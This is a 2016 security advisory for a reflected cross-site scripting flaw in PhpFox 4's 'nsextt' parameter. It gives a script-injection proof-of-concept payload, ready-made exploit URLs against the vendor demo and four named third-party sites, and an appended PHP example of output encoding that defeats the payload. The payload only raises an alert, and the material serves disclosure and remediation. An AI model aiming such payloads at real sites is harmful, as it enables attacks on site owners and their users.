
PHPFox 4 Cross Site Scripting

Posted on 10 June 2016

###########################################
# Title : PhpFox4 Cross Site Scripting Vuln.
# Author : bl4ck_MohajeM ( mohajem.war@gmail.com)
# Software Link: http://www.phpfox.com/
# Version: 4
# Date : 06/09/2016
# Category: WebApps
# Tested with : Ubuntu / Win
###########################################
[Description]

This CMS has a Cross Site Scripting vulnerability in the 'nsextt' parameter.
PhpFox takes the value of this parameter from the client without applying any PHP anti-XSS function.

Vuln. Input ==> /?nsextt=
###########################################
[Proof of Concept]

Add this instead of '/?nsextt=':

/?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>

You will then see an alert that contains '209'.
###########################################
[Example]

https://v4.phpfox.com/v/category/69/comedy/?nsextt=%27%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Ealert(0x0000D1)%3C/scRipt%3E
https://v4.phpfox.com/blog/
https://v4.phpfox.com/photo/
https://v4.phpfox.com/forum/
https://v4.phpfox.com/poll/
https://v4.phpfox.com/quiz/
https://v4.phpfox.com/event/
https://v4.phpfox.com/music/
https://v4.phpfox.com/marketplace/
https://v4.phpfox.com/pages/
https://v4.phpfox.com/invite/

demo :

tabrizcloob.ir/forum//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
alachikh.ir/poll//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
facebook2.ir/event//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
avs.ir/music//?nsextt='"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>
###########################################
[Solution]

The programmer should encode the data received from clients.
###########################################
tnx : sha4yan - arf1372 - Milad Hacking - n1arash - Und3rgrounD - shabgard - b3hz4d
###########################################
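The encoding called for under [Solution], shown as an added example that is not phpFox code and not part of the original advisory. The advisory does not say where 'nsextt' is reflected, so the function names, the link markup and the three output contexts below are assumptions; the input is the proof-of-concept value from above.

```php
<?php
declare(strict_types=1);
// Added example, not phpFox source: function names and markup are hypothetical.

// Proof-of-concept value from the advisory, as it would arrive in $_GET['nsextt'].
$nsextt = '\'"--></style></scRipt><scRipt>alert(0x0000D1)</scRipt>';

// Before: raw concatenation, the pattern the advisory describes.
function vulnerable_link(string $v): string {
    return '<a href="/forum/?nsextt=' . $v . '">next</a>';
}

// Encoder for HTML body text and quoted attribute values.
function html_escape(string $v): string {
    return htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Encoder for a JavaScript string literal inside an inline script block.
function js_literal(string $v): string {
    $flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
    return json_encode($v, $flags | JSON_THROW_ON_ERROR);
}

// After: URL-encode for the query string, then HTML-escape for the attribute.
function safe_link(string $v): string {
    return '<a href="' . html_escape('/forum/?nsextt=' . rawurlencode($v)) . '">next</a>';
}

// No encoded form may still contain a raw angle bracket.
foreach ([html_escape($nsextt), js_literal($nsextt), rawurlencode($nsextt)] as $out) {
    if (preg_match('/[<>]/', $out) === 1) {
        throw new RuntimeException('unencoded markup in: ' . $out);
    }
}

echo 'raw       : ', vulnerable_link($nsextt), "\n";
echo 'attribute : ', safe_link($nsextt), "\n";
echo 'body      : <p>', html_escape($nsextt), "</p>\n";
echo 'script    : <script>var nsextt = ', js_literal($nsextt), ";</script>\n";
```

Each output context needs its own encoder: `html_escape` alone is not sufficient for a value placed inside a script block, which is why `js_literal` is separate.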

 
